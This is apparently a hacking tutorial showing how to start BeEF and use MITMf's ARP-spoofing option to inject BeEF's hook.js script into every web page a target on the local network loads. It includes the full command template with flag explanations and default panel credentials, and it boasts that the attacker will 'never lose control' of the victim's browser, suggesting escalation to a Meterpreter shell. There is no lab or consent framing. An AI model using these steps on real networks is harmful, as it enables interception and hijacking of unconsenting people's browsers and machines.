If you don’t already have it, install MITMf via apt-get install mitmf. You might want to apt-get update first. If you want to, you can clone it from the Git repository (git clone https://github.com/byt3bl33d3r/MITMf), but I’ve had trouble with that version.
BeEF should already be installed in Kali/Back|Track.
Step 1: Start BeEF
Open a new terminal and type cd /usr/share/beef-xss/.
As you can see, we have BeEF installed, and we can go ahead and run it by typing ./beef. You should get this output:
Do you see the Hook URL? That’s important. Remember or copy the URL provided.
Step 2: Open the Panel
Now you can open the BeEF web panel with the UI URL. Once presented with the login page, you should just be able to get in with the default credentials “beef” for both the username and password. Once inside the UI, you should have this screen:
Step 3: Inject the Hook.js Script
Open up a new terminal. We’ll be using MITMf to inject the hooking script. Use mitmf –spoof –arp -i <interface> –gateway <router IP> –target <target IP> –inject –js-url <hook.js URL> as the format.
- –spoof loads the spoof plugin
- –arp redirects ARP packets
- -i specifies the interface to inject packets on
- –gateway sets the IP of your router to redirect through
- –target sets the target IP to inject the hook.js script
- –inject loads the inject function
For instance, I use this command:
Run the command and MITMf should start giving you some output.
MITMf is telling us that it has successfully injected the hook.js script into the websites that the target visited.
Step 4: Back to BeEF
If we check our BeEF panel, you will see the hooked computer right on the Online Browsers tab.
Remember in my previous XSS posts where I said the victim must stay on the webpage for you to have control of it? Guess what? You don’t have to worry about that now! MITMf will continue injecting the script into every website the victim visits, so you’ll never lose control!
Now we know what power lies within MITMf… we can do so much more. From there, you can continue trying to exploit the victim machine, and maybe get a Meterpreter prompt! Ah, the joy of MitM attacks…